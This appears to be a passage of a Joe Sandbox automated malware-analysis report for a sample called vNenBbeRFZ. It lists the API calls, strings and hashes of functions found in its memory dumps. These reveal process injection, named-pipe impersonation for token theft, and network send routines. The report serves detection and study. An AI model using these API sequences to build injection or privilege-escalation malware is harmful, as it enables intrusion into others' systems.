htons.WS2_32(?), ref: 03D77663
inet_addr.WS2_32(03D7776C), ref: 03D7766F
sendto.WS2_32(00000000,00000000,0000000A,00000000,?,00000010), ref: 03D77689

Strings

d, xrefs: 03D775DC

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: b01016f8cf12525343e0169e7f5571c54df23bb43d89b9575529264437a0b7d9
Instruction ID: ad4ce52647ba1a432a88f374cd1758e87d4cdb717aa6a90a27bd0092ba5b1ad7
Opcode Fuzzy Hash: b01016f8cf12525343e0169e7f5571c54df23bb43d89b9575529264437a0b7d9
Instruction Fuzzy Hash: 94217C72900218ABDF51EFA4DC45BEE7BB9EF0C700F1001A6EA04E6255EB70CA518F90

Function 03D73BC9 Relevance: 16.6, APIs: 11, Instructions: 127threadinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D78F9C: GetCurrentProcess.KERNEL32(?,03D73BE7,55FF50D4,03D77FC2,00000000), ref: 03D78FA8

GetThreadContext.KERNEL32(?,?,03D77FC2,00000000), ref: 03D73C0F
GetLastError.KERNEL32 ref: 03D73C19
ReadProcessMemory.KERNEL32(55FF50D4,?,?,00000004,00000000), ref: 03D73C45
ReadProcessMemory.KERNEL32(55FF50D4,?,?,00000008,00000000), ref: 03D73C5B
VirtualProtectEx.KERNEL32(55FF50D4,006A0875,?,00000004,?), ref: 03D73C71
_malloc.LIBCMT ref: 03D73C80
_memset.LIBCMT ref: 03D73C8F
_memset.LIBCMT ref: 03D73CC0
WriteProcessMemory.KERNEL32(55FF50D4,006A0875,00000000,?,03D740F1), ref: 03D73CE2
GetLastError.KERNEL32 ref: 03D73CEC
_memset.LIBCMT ref: 03D73D01

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Process$Memory_memset$ErrorLastRead$ContextCurrentProtectThreadVirtualWrite_malloc
String ID:
API String ID: 3502685472-0
Opcode ID: 14be039d4f520b4e2d15069c26b225938ac0bd3d3b31d0281ac0f0b0c2d21c0c
Instruction ID: 5f39aeac53f0b0fbc1360f78f6cd8575f7426058b22f7f8e1e416673997eab43
Opcode Fuzzy Hash: 14be039d4f520b4e2d15069c26b225938ac0bd3d3b31d0281ac0f0b0c2d21c0c
Instruction Fuzzy Hash: 5441AFBA500208BEEB10EBA5DC45EBFB7BDEF04A44F040455F644D6190FB329951EBB5

Function 03D733BF Relevance: 16.6, APIs: 11, Instructions: 103sleepfilepipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D733D5
GetLastError.KERNEL32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D73435
GetTickCount.KERNEL32 ref: 03D73440
Sleep.KERNEL32(000003E8,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D7344B
GetLastError.KERNEL32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D73457
WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,?,?,?,?,00000001), ref: 03D73489
WriteFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 03D734B4
FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D734C8
DisconnectNamedPipe.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D734D1
CloseHandle.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D734DA
Sleep.KERNEL32(000003E8,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?,03D78B89), ref: 03D734E5

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersCloseDisconnectFlushHandleNamedPipe
String ID:
API String ID: 1326360348-0
Opcode ID: fc0ed059b623a9b8b33a4b2685e2a39d5890f0d5d52d32084e8d7089ba894c89
Instruction ID: 1bdc31f6c5228e15494361697f8567ce39b23646b69da7f746c9a55674bdf776
Opcode Fuzzy Hash: fc0ed059b623a9b8b33a4b2685e2a39d5890f0d5d52d32084e8d7089ba894c89
Instruction Fuzzy Hash: F4313E76D00218BFDB01EBE4DC85AEEB778EB45704F140462E545F6250EB319E48ABA1

Function 03D781A0 Relevance: 16.6, APIs: 11, Instructions: 101threadCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 03D781B1
GetLastError.KERNEL32 ref: 03D781C0
UpdateProcThreadAttribute.KERNEL32(?,00000000,00020000,?,00000004,00000000,00000000), ref: 03D781EE
GetLastError.KERNEL32 ref: 03D781F8
CloseHandle.KERNEL32(00000000), ref: 03D78209
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000001,00000003), ref: 03D78231
DuplicateHandle.KERNEL32(00000000), ref: 03D78238
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 03D78263
DuplicateHandle.KERNEL32(00000000), ref: 03D78266
GetCurrentProcess.KERNEL32(?,?,?,00000000,00000001,00000003), ref: 03D7827F
DuplicateHandle.KERNEL32(00000000), ref: 03D78282

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: HandleProcess$CurrentDuplicate$ErrorLast$AttributeCloseOpenProcThreadUpdate
String ID:
API String ID: 2151055714-0
Opcode ID: dd85a2371f78f34332b3a5cd5b7a2693d04f0166a000930dc2a862c97b5cae36
Instruction ID: 2ada72b91513f9c4e9ecddf04f5abe8540ddf4fe3733323f354d6c5f32b1017b
Opcode Fuzzy Hash: dd85a2371f78f34332b3a5cd5b7a2693d04f0166a000930dc2a862c97b5cae36
Instruction Fuzzy Hash: 50316F72640214BFDB60EFA0DC4AF6B7B6DEB46B55F140445FA05AA280E6719901EB70

Function 03D7580C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85filelibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,00000000,?,?,?,03D754C2,00000000,00000000), ref: 03D75839
GetProcAddress.KERNEL32(00000000), ref: 03D75840
CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 03D7585C
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,03D754C2,00000000,00000000), ref: 03D75872
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,03D754C2,00000000,00000000), ref: 03D758AF
CloseHandle.KERNEL32(00000000,?,?,03D754C2,00000000,00000000), ref: 03D758B6
GetLastError.KERNEL32(?,?,03D754C2,00000000,00000000), ref: 03D758C1

Strings

ntdll.dll, xrefs: 03D75834
NtMapViewOfSection, xrefs: 03D7582F

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: File$HandleView$AddressCloseCreateErrorLastMappingModuleProcUnmap
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 2680503992-3170647572
Opcode ID: 33168b844b28c8495ef61a5fa02a40a5e68fa77f9ba4790695b0fe1cc92ba29b
Instruction ID: 080d3791953491d8c686b7188020c62c71bbd5c416c30ace6a141cc9e32066d6
Opcode Fuzzy Hash: 33168b844b28c8495ef61a5fa02a40a5e68fa77f9ba4790695b0fe1cc92ba29b
Instruction Fuzzy Hash: 1D21C276901228BFDB20ABB1AC4DDAF7F6DEF4AB71F240516F616E6180E6304500D7B1

Function 03D774F7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D77508
select.WS2_32(00000000,00000000,?,?,00000000), ref: 03D77556
__WSAFDIsSet.WS2_32(00000000,?), ref: 03D77566
__WSAFDIsSet.WS2_32(00000000,?), ref: 03D77579
send.WS2_32(00000000,00000000,?,00000000), ref: 03D7758D
WSAGetLastError.WS2_32(00000000,?,00000000,?,?,00000000), ref: 03D77597
Sleep.KERNEL32(000003E8,?,00000000), ref: 03D775A9
GetTickCount.KERNEL32 ref: 03D775AF

Strings

d, xrefs: 03D77516

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 586161518b7b3c160bbbc66467165f4942a4b4ec860fbc80eba7ff36fd45a54d
Instruction ID: 9cb8e95801621d25d1fabfce2e6ecfd47dc881dd1f96a5d9c3bf89f6c03dfd73
Opcode Fuzzy Hash: 586161518b7b3c160bbbc66467165f4942a4b4ec860fbc80eba7ff36fd45a54d
Instruction Fuzzy Hash: 52118271D4021DABDB11EFA4DC85BE9BBBCEB08750F1045A7E605E61E0E7709A858F90

Function 03989D4D Relevance: 13.6, APIs: 9, Instructions: 105COMMON

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 03989D4F
__init_pointers.LIBCMT ref: 03989E07
__encode_pointer.LIBCMT ref: 03989E12
__encode_pointer.LIBCMT ref: 03989E22
__encode_pointer.LIBCMT ref: 03989E32
__encode_pointer.LIBCMT ref: 03989E42
__decode_pointer.LIBCMT ref: 03989E63
__calloc_crt.LIBCMT ref: 03989E7C
__decode_pointer.LIBCMT ref: 03989E96

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __encode_pointer$__decode_pointer$__calloc_crt__crt_waiting_on_module_handle__init_pointers
String ID:
API String ID: 1960427394-0
Opcode ID: 8f364794ccb6f05bd5b5cdfb8bf60533199f60f4f2f78c521bf241e129551c82
Instruction ID: 4970f21bf51e5719e1826a1c2f3dec2636112b16c008ccb63cd3aa44771d6768
Opcode Fuzzy Hash: 8f364794ccb6f05bd5b5cdfb8bf60533199f60f4f2f78c521bf241e129551c82
Instruction Fuzzy Hash: 1931B2798017209FFB12FF349C86A257EE8AB89390B15891EF815DF1B2EB399441CB50

Function 03D773EC Relevance: 13.6, APIs: 9, Instructions: 101networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 03D7740B
htons.WS2_32(00000000), ref: 03D7741C
socket.WS2_32(00000002,00000001,00000000), ref: 03D77455
closesocket.WS2_32(00000000), ref: 03D77464
gethostbyname.WS2_32(00000000), ref: 03D77482
htons.WS2_32(?), ref: 03D774AE
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 03D774C1
connect.WS2_32(00000000,?,00000010), ref: 03D774D2
WSAGetLastError.WS2_32(00000000,?,00000010), ref: 03D774DB

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 93bcc004706dca2010ca391d991835bde930edaade46252c7966de865d56ade3
Instruction ID: d1fb875f4b7100717d6970253a049cf947e8d4cc7718789f8f286dd0cd7d9fe4
Opcode Fuzzy Hash: 93bcc004706dca2010ca391d991835bde930edaade46252c7966de865d56ade3
Instruction Fuzzy Hash: F931087AD40218AAEF20EBF5DC44EBEB7BCEF08614F440566F584EB181F6348A018775

Function 03D75B34 Relevance: 13.6, APIs: 9, Instructions: 98memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D75B4B
GetVersionExA.KERNEL32(?), ref: 03D75B64
SetLastError.KERNEL32(00000005), ref: 03D75B86
VirtualAlloc.KERNEL32(00000000,0000004C,00003000,00000040,00000000,00000000,00000000), ref: 03D75BA3
VirtualAlloc.KERNEL32(00000000,00000149,00003000,00000040), ref: 03D75BB8
SetLastError.KERNEL32(00000006), ref: 03D75C08
ResumeThread.KERNEL32(?), ref: 03D75C13
VirtualFree.KERNEL32(03D754C2,00000000,00004000), ref: 03D75C2A
VirtualFree.KERNEL32(00000000,00000000,00004000), ref: 03D75C30

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Virtual$AllocErrorFreeLast$ResumeThreadVersion_memset
String ID:
API String ID: 3980149099-0
Opcode ID: 50395c1a0291b835886ce15cd189606a6acfd7078a916f9e7a0753f1430a787b
Instruction ID: bdea7e295ecd9e2faaf9e732358c8010157dc451ebe4154cf38ca4465577efe6
Opcode Fuzzy Hash: 50395c1a0291b835886ce15cd189606a6acfd7078a916f9e7a0753f1430a787b
Instruction Fuzzy Hash: 6031D472A40318ABE720DF64AC45F5B77B9EB06B11F040069FA0DEB2C1E7B0A9048B95

Function 03D73697 Relevance: 13.6, APIs: 9, Instructions: 58pipethreadfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D736B4
GetLastError.KERNEL32 ref: 03D736C7
ConnectNamedPipe.KERNEL32(00000000), ref: 03D736DB
ReadFile.KERNEL32(?,00000001,?,00000000), ref: 03D736F5
ImpersonateNamedPipeClient.ADVAPI32 ref: 03D73705
GetCurrentThread.KERNEL32 ref: 03D7371A
OpenThreadToken.ADVAPI32(00000000), ref: 03D73721
DisconnectNamedPipe.KERNEL32(FFFFFFFF), ref: 03D73735
CloseHandle.KERNEL32 ref: 03D73741

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientCloseConnectCurrentDisconnectErrorFileHandleImpersonateLastOpenReadToken_memset
String ID:
API String ID: 3848656792-0
Opcode ID: c7c57d989d71ef65ddbabb54af80681d5046dd2537feb26f5e74b5801fbdff6d
Instruction ID: d9d821fa749acdad0cae3d1758ca4162dbb6f07a23350aca19167e6ffffd3b9d
Opcode Fuzzy Hash: c7c57d989d71ef65ddbabb54af80681d5046dd2537feb26f5e74b5801fbdff6d
Instruction Fuzzy Hash: 83117372604209EFDB11BBA4ED89A69B77CFB00F44F044061F546D1254E6B0DD14FBB4

Function 00401C80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00401CAF
vfprintf.MSVCRT ref: 00401CCF
abort.MSVCRT ref: 00401CD4
VirtualQuery.KERNEL32 ref: 00401D67
VirtualProtect.KERNEL32 ref: 00401DBD
GetLastError.KERNEL32 ref: 00401DCA

Strings

@, xrefs: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1616349570-2766056989
Opcode ID: 85e2b7a105be24f94f4b22f191e92a7d3619bacb759905963a6f226e482b1493
Instruction ID: 052ff450f47804e7cc67cd511c825b82da4c569a48b722d81360f6390ff8d5d7
Opcode Fuzzy Hash: 85e2b7a105be24f94f4b22f191e92a7d3619bacb759905963a6f226e482b1493
Instruction Fuzzy Hash: E84140B15047019FC700EF69D98561BBBE0FF84354F45893EE888AB3A1D778E844CB96

Function 03D7B6F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D7B714
_memset.LIBCMT ref: 03D7B722
_memset.LIBCMT ref: 03D7B730
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,03D7B7CF,?,?,?,?,?,03D7B7CF,?,?), ref: 03D7B74D
LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 03D7B77C
__snprintf.LIBCMT ref: 03D7B79E

Strings

%s\%s, xrefs: 03D7B797

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$AccountInformationLookupToken__snprintf
String ID: %s\%s
API String ID: 2009363630-4073750446
Opcode ID: 40c3cf41d8072382eeed5da0c6cce809d50767bc52a53dbbdcbda2ed4cf9a794
Instruction ID: 41e9a5ac198f99926a146fcff1fc11790574f3997621e9ee8d1e5a9a90dc9aad
Opcode Fuzzy Hash: 40c3cf41d8072382eeed5da0c6cce809d50767bc52a53dbbdcbda2ed4cf9a794
Instruction Fuzzy Hash: 2D21D3B690021CBEDB11DB94DC85EEF777CEB04744F0444AAB515E6141E670AB848B64

Function 03D7B27B Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 03D7B28C

Part of subcall function 03D86F7E: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,03D7B291,00000000), ref: 03D86F89
Part of subcall function 03D86F7E: __aulldiv.LIBCMT ref: 03D86FA9

_malloc.LIBCMT ref: 03D7B2B5
_strncpy.LIBCMT ref: 03D7B2D5
_strtok.LIBCMT ref: 03D7B2EC
_strtok.LIBCMT ref: 03D7B30B

Part of subcall function 03D86EBD: __getptd.LIBCMT ref: 03D86EDB

__time64.LIBCMT ref: 03D7B31D
__time64.LIBCMT ref: 03D7B3AC
__time64.LIBCMT ref: 03D7B448

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __time64$Time_strtok$FileSystem__aulldiv__getptd_malloc_strncpy
String ID:
API String ID: 2319056096-0
Opcode ID: f394751e08808d072f527191b22d449c3176ba8988259f3ec08148cbf802534a
Instruction ID: 636484a129ea179c39c6b5cf7043ab6fd05e97dc0b4b9921b6155fe898313c27
Opcode Fuzzy Hash: f394751e08808d072f527191b22d449c3176ba8988259f3ec08148cbf802534a
Instruction Fuzzy Hash: 0A5138B7D00B84DFC725FF68E680469BBB6F708718314826FE5498B348EA759A80DF54

Function 0397A6C9 Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0397A6DA

Part of subcall function 039863CC: __aulldiv.LIBCMT ref: 039863F7

_malloc.LIBCMT ref: 0397A703
_strncpy.LIBCMT ref: 0397A723
_strtok.LIBCMT ref: 0397A73A
_strtok.LIBCMT ref: 0397A759

Part of subcall function 0398630B: __getptd.LIBCMT ref: 03986329

__time64.LIBCMT ref: 0397A76B
__time64.LIBCMT ref: 0397A7FA
__time64.LIBCMT ref: 0397A896

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __time64$_strtok$__aulldiv__getptd_malloc_strncpy
String ID:
API String ID: 3363204686-0
Opcode ID: 14cd0875e9ca5e3a7e750f6e52949a99e3413afe09cbdd003b127a6c368c3a31
Instruction ID: d0957c5ae95c384d183e38fd6044db143910b3b0b160648fbebbb868fb43debd
Opcode Fuzzy Hash: 14cd0875e9ca5e3a7e750f6e52949a99e3413afe09cbdd003b127a6c368c3a31
Instruction Fuzzy Hash: 275147B5D00620DFE716DF29CDC08A9BBB9F68A355714812EE4098F3A2D73989C2DF40

Function 00402110 Relevance: 12.1, APIs: 8, Instructions: 90COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0040214F
signal.MSVCRT ref: 00402196
signal.MSVCRT ref: 004021AF
signal.MSVCRT ref: 004021D6
signal.MSVCRT ref: 0040221A

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 04c8b6ed4d32a045ad3a7e2fcf4e944b607314ffbe0705e5fb53707723311e1c
Instruction ID: eef3b470f3d49748d555ffe711b3b57ae26f8f87c875975a37fbc148204a5943
Opcode Fuzzy Hash: 04c8b6ed4d32a045ad3a7e2fcf4e944b607314ffbe0705e5fb53707723311e1c
Instruction Fuzzy Hash: E63121B01046008AE7206FA6864C32F76D0AB45328F154B6FE9E4EB3D1CBFDC985971B

Function 03970FB3 Relevance: 10.9, APIs: 7, Instructions: 422COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0397124B
_memset.LIBCMT ref: 0397128B
_memset.LIBCMT ref: 039712D5
_memset.LIBCMT ref: 0397131F
_memset.LIBCMT ref: 03971369
_memset.LIBCMT ref: 039713B9
_memset.LIBCMT ref: 039713E1

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 913e89af5243476f04ccb29c9e1c7413528508fbc0330dd79404e9a5dc4655e9
Instruction ID: 540f4cd47ab06b6e49f4ad82893487eb4acfd38d083afbbff144eb6697f8eab4
Opcode Fuzzy Hash: 913e89af5243476f04ccb29c9e1c7413528508fbc0330dd79404e9a5dc4655e9
Instruction Fuzzy Hash: 55D1D4B6A007059FEB20DF69CC80967B7FAFB8424471C4D3DF196DAA91E234F9958B10

Function 03D8696C Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D869CE
_memcpy_s.LIBCMT ref: 03D86A43
__fileno.LIBCMT ref: 03D86AA3
__read.LIBCMT ref: 03D86AAA
__filbuf.LIBCMT ref: 03D86ACE
_memset.LIBCMT ref: 03D86B14
_memset.LIBCMT ref: 03D86B3F

Part of subcall function 03D8747A: __getptd_noexit.LIBCMT ref: 03D8747A

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
